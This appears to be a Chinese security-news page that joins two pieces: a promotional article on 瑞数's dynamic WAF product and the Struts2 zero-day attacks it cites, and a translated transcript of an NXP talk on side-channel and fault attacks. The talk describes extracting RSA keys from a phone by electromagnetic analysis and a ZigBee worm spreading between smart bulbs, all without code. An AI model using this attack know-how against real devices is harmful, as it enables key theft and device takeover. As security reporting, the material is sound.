漏洞无穷尽，补丁补不完；

掏空我的不是爱情，是漏洞

……

拿Web应用举例，Web应用除了要应对OWASP TOP10稳居前列的SQL注入、跨站脚本XSS、认证和Webshell木马上传等传统攻击，还要应对大量新兴安全威胁及漏洞，例如Bots攻击、API数据泄露、零日漏洞等。

也就是即使应用代码中移除了所有已知漏洞，威胁也会以零日攻击的形式继续存在。（这句话出自Forrester Wave的报告）

这些新兴安全威胁可以轻松绕过传统验证码的人机识别技术，也使传统WAF的防护瓶颈愈加凸显：

只能通过规则更新阻拦零日漏洞，过于滞后和被动；

只能通过信誉库、黑名单、限频规则设定等手段防御应用DDoS；

只能通过策略规则识别和阻拦OWASP Top10 web安全威胁，误报多，运维工作量大。

运维狗情不自禁哭出声。

这时候开始有人思考，漏洞是补不完的，但是不是可以隐藏漏洞？

《Gartner 2018年WAF魔力象限报告》指出全球Web Application Firewall的市场高达8.5亿美元，亚太地区增长率为13.5%，超过全球11.9%的增长率，而中国WAF市场也以14% - 15%的速度在逐年增长。企业Web应用最有效的技术中，WAF已处于首位（占73％）。

但是传统Web安全技术却并不完美，诸多安全厂商开始寻找最佳防护姿势。

静态防不住换动态，规则防不住就用智能，瑞数就是这么做的。

不久前，瑞数信息发布全球第一款双引擎动态WAF――瑞数灵动River Safeplus，这款动态WAF采用瑞数独有的“动态安全引擎” + “AI智能威胁检测引擎”，内建智能模型，不依赖于规则，即可精确识别Bots和各类攻击，为Web安全提供主动式的安全防护。

怎么个主动法？

瑞数信息的副总裁赵晔宇举了个例子，2017年时候有个厉害的零日漏洞Struts2-045，其破坏力超强堪称王者。更牛X的是它爆发时间正好在2017年3月初两会期间，很敏感的时间。（围观群众露出了你懂我也懂的眼神）据说瑞数的一个用户也在这个时候受到了攻击。

赵晔宇

赵晔宇告诉雷锋网，那次攻击第一波出现在公安部或其他国家权威机构公布这个零日漏洞的前两天。如果要等机构通报，那第一波的黑客攻击已经完事了，换句话说，黑客一定是比通报机构更早知道这个零日漏洞，所以他才能更早的去利用，所以第一波是正式公布的前两天。

但是机构公布后就会引发第二波超强攻击，为什么呢？

这就像新的传染病爆发出来后，要需要一段时间去研究疫苗，那在这段空窗期内，基本就是感染必死，唯一的办法就是拔线，没错，就是这么简单粗暴。

这时候安全厂商能做什么？只能打补丁，疯狂打补丁。“我记得那个时候有些友商一个团队的技术人员觉都没睡。”

但奇怪的是，明明打好了补丁这家倒霉客户又遭到了第三波攻击，进一步研究了这次攻击特征后，才发现黑客利用的是Struts2-032这个漏洞（爆发出来的是045）。也就是，Struts2是一个零日漏洞的家族，这个家族包含1、2、4……45（当时）这些漏洞，当然截止现在这个家族还在扩大。

黑客在进行攻击的时候，比任何一家企业都要讲效率，他们不会一次只用一个攻击，攻击工具往往是一个家族。所以丧心病狂的黑客可能是把Struts2这个攻击家族，从Struts2-01一直到045全部去试一遍，来找到你存在的漏洞。

这个事例说明了什么？

传统的WAF防护，是滞后的、被动的，存在时间差的，依靠规则的更新，依靠打补丁去防御攻击，永远都是百密一疏。怎么让这种防御主动起来？

瑞数动态安全引擎会对当前页面内的合法请求地址授予一定时间内有效的动态令牌，并为每个客户端生成不依赖于设备特征的唯一标识。令牌的动态变换，加上客户端唯一标识，可防止攻击者通过伪造客户端环境、伪造令牌的方式绕过追踪，阻拦非法的自动化攻击请求。

同时，动态安全引擎通过在页面中随机自动插入动态验证脚本，实现对访问客户端的人机识别，从而阻拦脚本、程序等自动化攻击行为，并保障应用逻辑的正确运行。

动态验证包含真实浏览器形态验证、浏览器指纹及异常行为模式监测三大模块。动态验证的过程中，还会根据威胁态势生成不同的检测代码，提升攻击者或自动化工具假冒合法客户端的难度，有效克服现有终端感知产品使用静态采集代码、被逆向后易于被绕过的安全难题。

为了更“人性化”，River Safeplus 采用了AI智能威胁检测引擎，可以做到深度识别 ， 精准溯源。

具体来说，这个智能引擎基于大数据分析技术，对客户端到服务器端所有的请求日志进行全访问记录，并利用机器学习进行深度行为分析。通过智能规则匹配，持续监控并分析流量行为，从而深入检测威胁攻击。

AI智能威胁检测引擎在用户和应用程序交互的过程中采集环境和行为特征信息，并利用统计模型来确定HTTP请求的异常。另外，还会基于IP/设备指纹/浏览器形态/操作事件/会话对象等上百个维度进行应用层威胁建模和数据训练学习，区分正常用户及攻击者操作序列，及时阻拦异常行为的访问请求。

总之有了AI神器加持，检测引擎等于有了揪出隐蔽攻击的“千里眼”和实现精准攻击溯源的“顺风耳”。

那么八卦的编辑好奇发问，灵动上线真的有帮小哥哥们减轻负担吗，会有什么不一样的感觉？

90%的外部攻击都是黑客通过一个程序、工具扫描企业网站寻找可攻击的漏洞，以往的拦截方式是在自己的安全产品上增加规则，也就是可能这款产品可以拦截10种漏洞，发现没拦住的新品种需要手动增加规则，变成可以拦截11种漏洞。而灵动做的是从源头抓起，恶意工具首次访问就被拦下，至于之后的N种漏洞就无计可施了。

当然，小哥们也不可能什么都不做，毕竟这是个长期对抗过程。

赛博世界，攻防之战永远是道高一尺魔高一丈，止步于前只会将企业安全置于无处不在而不断升级的威胁之中。如果把安全厂商比作战斗在黑暗中的铁甲骑兵，这群冲在最前面的兵将们似乎需要升级武器，更加动态，更加智能。

雷锋网宅客频道（微信公众号：letshome），专注先锋科技，讲述黑客背后的故事，欢迎关注雷锋网 (公众号：雷锋网) 宅客频道。

雷锋网原创文章，未经授权禁止转载。详情见 转载须知 。

今天我们带来最后一个重磅内容，来自NXP首席安全技术专家 Markus Hinkelmann 博 带来的―― 《Beyond logical attacks》 。

首先什么是逻辑攻击？这很好理解，比如有一台设备，黑客可以通过特定的接口向设备发送任意数据，比如命令、安装程序以及任何支持的功能，在我的定义里这些就是“逻辑”。

beyond logical 的意思就是黑客对这个设备“做了点事”，但是一些与众不同的事。 在这个层面看看我们有什么。

这个图里有我们可以用的不同的技术/设备。 在最左边是最便宜的， 而右边是最贵的同时也往往是最难用的。 从左边开始说，比如拆开设备， 那么你可以逆向或修改这些PCB电路，读取flash等，做一些逆向工作这样你就可以支持下面要进行的“逻辑攻击”。 或者你想阻断什么东西短路什么东西， 你可以用像锡纸这样的工具。如果你想多花点钱， 那么你可以买一些这样的用于侧信道攻击/错误注入的便宜的小平台，或下面这些专业一点更贵一点的设备，你可以做信号的识别/测量，比如 “非常直接的”注入错误信号。 或者比较特别的攻击，用激光错误注入(去影响电子)，然后你可以改变寄存器中的内容。如果你有更高端的设备，甚至可以改变整个寄存器。其他的设备用于逆向工程，用显微镜查看芯片等。这块我可以打住了， 我已经介绍了什么是beyond。

所以我想聚焦于与IoT的相关性， 到底什么攻击与IoT相关。 它可以是PCB级别的， 黑掉任何你可以物理接触的东西，我不打算讨论这些。 这里主要让我们关注两个在IoT设备上的侧信道攻击的例子。

第一个是利用RSA算法的弱点进行简单电磁分析， 这里介绍下背景。 电磁分析是一种侧信道攻击手段， 攻击者测量设备运行与计算时产生辐射的电磁能量，你可以测量出1和0在计算时的不同能量，电磁辐射的测量更多是测量偏差， 反应运算中循环、 函数等，所以你可以看到不同的频率体现。所以这很简单，我们所需的所有便是一次加密过程的数据。

我接下来会展示个视频， 获取安卓手机上的RSA私钥，这是个常见的安卓手机，存在有漏洞的实现，据我所知目前市场上在售的一些发行版仍有这些问题。如果这些私钥泄露可以做什么呢， 这些可以拿来做签名， 在通讯建立时也要使用。你可以简单的伪造别人的身份，或者你可以破坏进入某些系统， 或者我们在之前的一个议题中看到的，对OTA做些攻击。这个例子的有趣的在于我们不需要拆开设备。我们只需要一个电磁信号放大器就能够做到，在获取数据之后还要进行一些爆破攻击，去获取剩下需要的信息，要做到这些仅需要1分钟。我们做了一个一分钟的演示视频。

你可以看到这里有一部手机与侧信道攻击设备和一个笔记本，用到的工具都不是很贵。然后你可以看到我们将一个信号探测器放在了手机CPU的位置，然后进行攻击，这里用PicoScope去记录这个设备发出的电磁信号波形，这里正在进行获取RSA私钥的运算，需要花一些时间，然后你可以看到运算结束，RSA的运算被找到了！然后寻找p和q的信息。在爆破剩余需要的信息之前这些数据还不能用。 现在key恢复程序正在运行， (好， 停在这)搞定了。 这里就是RSA私钥， 或者你想看密钥的参数就在这里。那么这期间到底发生了什么？我们可以利用电磁辐射做什么？因为这个攻击设备需要很接近手机，但是攻击者可以从更远的地方攻击同样的漏洞 (如通过网线)，但数据会相对不准确。一但接触到信号源， 那么信号的质量就会好很多， 你可以看到后续的爆破攻击只需要几秒。 这是第一个例子。

第二个例子， 让 IoT 设备进行核反应，构成一个ZigBee链式反应。

我们分析了飞利浦的智能灯，你可以看到这里是一种智能灯安装方案， 它连接一些设备后与路由器连接，然后进行一些云通讯。 这些智能灯的问题在于它的AES实现是有漏洞的(我知道有些人知道这个)，你可以获取固件更新的key，然后用这个key(如果设计的比较好的话，通过这个key你只能黑掉你当前的这台设备，这就到头了)，如果设计的不好的话就产生了其他问题，比如你拿到这个key能黑掉其他设备了。接下来还有更糟糕的， 那就是这个实现， 这些灯中的ZigBee有另外的问题， 他会扫描其他的ZigBee设备， 任何人都可以在远程与他通信。你可以将你自己的代码写入一个智能灯， 用它去黑掉另一个灯去，这个灯自己再黑掉另一个灯，周而复始循环下去。 这样你可以从一个楼的灯到另一个楼的灯， 相当于你跳入了另一个公司， 这确实很恐怖是吧，只是用一个板子(仅仅需要图片里的这个 价值大概$50)， 然后你的第一步就达成了， 接下来你就用“逻辑攻击”去攻击剩下的系统。

IoT我想说的另个方面是AI，特指深度学习。AI简化了攻击步骤。 而且AI有潜力减少了不少攻击者需要的专业知识。 意味着攻击可以变得更简单，减少了攻击成本，从另一方面增加了被攻击风险。

这里也许只有2个我想分享的， 2017年有很多网络攻击事件发生，有两件比较有趣的事发生在2017~2018年，我们看到了Rowhammer和Nethammer攻击，内存单元可以被hammer方式攻击，这是物理方面的影响，将bits弹到了其他区域，通过它你可以修改内存，这有点像错误攻击，因为这可以是某种“逻辑攻击”，因为软件存在内存里，但hammer攻击是个个物理攻击，这是个在逻辑和物理之间的灰色区域， 所以没准我需要重新定义我对他们的定义。

还有Nethammer， Nethammer意思是用远程通信有dram操作的速度足够对ram产生hammer效应的通信协议。那么事情就变为“物理攻击不完全依赖本地接触”。 另一个有趣的事就是Spectre和Meltdown，它们非常严重影响所有intel的产品， intel在修复这个问题时也面临很严重的问题。我们看到2周前Meltdown攻击已经来了，并且影响ARM，这意味着将会影响更多的设备。一些美国的大企业，如 google、apple、微软等，他们全部在寻求将这些问题移除的方法，他们一直在想办法判断什么样的访问是可以信赖的。就像我们之前展示的对RSA的攻击，有没有trustzone并不重要，因为有漏洞的代码被同样的处理器执行，意味着同样的模式被生成了。

最后做个简单的总结，我的意见是IoT安全不仅仅是“逻辑”上的保护， (我不会说“逻辑”上的保护不重要， 这不对)。远程和本地物理攻击者往往可以让攻击维度的延伸成为可能， 还记得之前的智能灯的例子么。最后，AI可以增强侧信道和错误注入攻击， 同时减少对专业门槛的依赖。

谢谢你们。

PPT下载链接https://cnbj1.fds.api.xiaomi.com/src/xiaomi-IoT-security-conference/Beyond%20logical%20attacks%20-%20Markus%20Hinkelmann.pdf